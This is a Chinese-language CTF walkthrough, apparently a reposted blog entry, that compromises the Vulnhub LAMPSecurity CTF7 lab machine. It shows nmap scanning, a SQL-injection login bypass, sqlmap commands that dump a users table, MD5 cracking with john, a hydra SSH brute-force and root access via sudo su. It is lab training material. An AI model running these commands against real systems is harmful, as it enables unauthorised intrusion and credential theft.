【Vulnhub-LAMPSecurity】CTF 7
作者:互联网
0x00环境
攻击机IP:192.168.1.28
目标机IP:192.168.1.136
0x01实战
端口扫描
nmap -sV-A -p- 192.168.1.136
可以看到开放了很多端口,其中80、8080、901、10000是http服务,那么我们就先去尝试访问这几个端口
http://192.168.1.136/就是正常的Web页面
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mhQWKoH1-1644369536166)(img/image-20220119140348097.png)]](https://www.icode9.com/i/ll/?i=0ca90ba913004f3596faf83fc49aea45.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_20,color_FFFFFF,t_70,g_se,x_16)
http://192.168.1.136:8080/login.php是一个登录的页面
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xYxOkhZp-1644369536166)(img/image-20220119140450749.png)]](https://www.icode9.com/i/ll/?i=1028febb4172421a9e60ef9ca7f7e6fe.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_20,color_FFFFFF,t_70,g_se,x_16)
http://192.168.1.136:901/也是需要登录才能查看
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZRJpqFaA-1644369536167)(img/image-20220119140826778.png)]](https://www.icode9.com/i/ll/?i=5337157f858f402d9582632b163cb00a.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_20,color_FFFFFF,t_70,g_se,x_16)
http://192.168.1.136:10000/也是一个登录页面,尝试了万能密码无法绕过。
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1TX1Mos9-1644369536168)(img/image-20220119141102689.png)]](https://www.icode9.com/i/ll/?i=6ba0266e8dd54622a16dc4a8a5b6e37b.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_20,color_FFFFFF,t_70,g_se,x_16)
漏洞发现
经过长时间的查找发现在http://192.168.1.136:8080/login.php处存在SQL注入可以使用万能密码绕过
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ayMrX85h-1644369536169)(img/image-20220119141434382.png)]](https://www.icode9.com/i/ll/?i=be9802c3e1d34272a83fa13224469837.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_15,color_FFFFFF,t_70,g_se,x_16)
成功登录
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PHXRsF6c-1644369536169)(img/image-20220119141452177.png)]](https://www.icode9.com/i/ll/?i=b606382ad9ab46d894518f4fd09fdf12.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_20,color_FFFFFF,t_70,g_se,x_16)
漏洞利用
使用sqlmap跑一下,使用burp抓包,将数据包保存并命名为sql.txt
暴库
sqlmap -r sql.txt --dbs
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-p52q5YjK-1644369536171)(img/image-20220119142058548.png)]](https://www.icode9.com/i/ll/?i=c23052c979e3483e8df59454a86eb176.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_20,color_FFFFFF,t_70,g_se,x_16)
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-eeDdkFwb-1644369536171)(img/image-20220119142320326.png)]](https://www.icode9.com/i/ll/?i=58985710aa4d41bb84783ace3506c6d4.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_20,color_FFFFFF,t_70,g_se,x_16)
爆表
sqlmap -r sql.txt -D website --tables
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sSkFyc60-1644369536172)(img/image-20220119142419938.png)]](https://www.icode9.com/i/ll/?i=7bdef8dc27bb41658851d5614804493c.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_12,color_FFFFFF,t_70,g_se,x_16)
暴字段
sqlmap -r sql.txt -D website -T users --columns
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5W30cL3n-1644369536173)(img/image-20220119142451735.png)]](https://www.icode9.com/i/ll/?i=c5e9565ccaaa4da583cca7f7560e88bd.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_14,color_FFFFFF,t_70,g_se,x_16)
拖库
sqlmap -r sql.txt -D website -T users -C username,password --dump
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fKKMhlB6-1644369536174)(img/image-20220119142616734.png)]](https://www.icode9.com/i/ll/?i=beb300253f6b4d0587ed4469e283b0b1.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_20,color_FFFFFF,t_70,g_se,x_16)
将用户名和密码拖下来分别保存为username.txt和password.txt,使用john破解密码
john --format=Raw-MD5 password.txt
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tzajY38M-1644369536174)(img/image-20220119143752306.png)]](https://www.icode9.com/i/ll/?i=4b388e2fa5f64674947192422d4c56d0.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_20,color_FFFFFF,t_70,g_se,x_16)
太慢了还是使用网站
- https://www.cmd5.com/
- https://www.somd5.com/
最终结果
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YQ7E0V5p-1644369536175)(img/image-20220119143859956.png)]](https://www.icode9.com/i/ll/?i=52a35d18a5e149a597417b9f1ef4cd4f.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_9,color_FFFFFF,t_70,g_se,x_16)
将得到的明文密码保存为password2.txt,使用hydra进行爆破
hydra -L username.txt -P password2.txt -t 4 192.168.1.136 ssh
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FpyitEXt-1644369536175)(img/image-20220119145637946.png)]](https://www.icode9.com/i/ll/?i=08dfa2d7ca76425fa864c0974eb774a9.png?,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA5bCP6bij5ZCM5a2mU0VD,size_20,color_FFFFFF,t_70,g_se,x_16)
在前面的端口扫描中我们看到开放了22-SSH端口,尝试登录,登录成功。
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Xjq7sj1D-1644369536176)(img/image-20220119150253570.png)]](https://www.icode9.com/i/ll/?i=30b75a45a7ab465283793cad45de1489.png)
提权
查看当前用户可以使用的sudo权限
sudo -l
可以看到当前用户可以以root身份运行所有命令
尝试使用sudo su提升权限,成功拿到root权限
sudo su
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gJrmfI17-1644369536177)(img/image-20220119150608198.png)]](https://www.icode9.com/i/ll/?i=4577f6127e8f44cfa957328978c49d75.png)
标签:sqlmap,http,LAMPSecurity,192.168,1.136,--,CTF,Vulnhub,txt 来源: https://blog.csdn.net/qq_44276741/article/details/122835156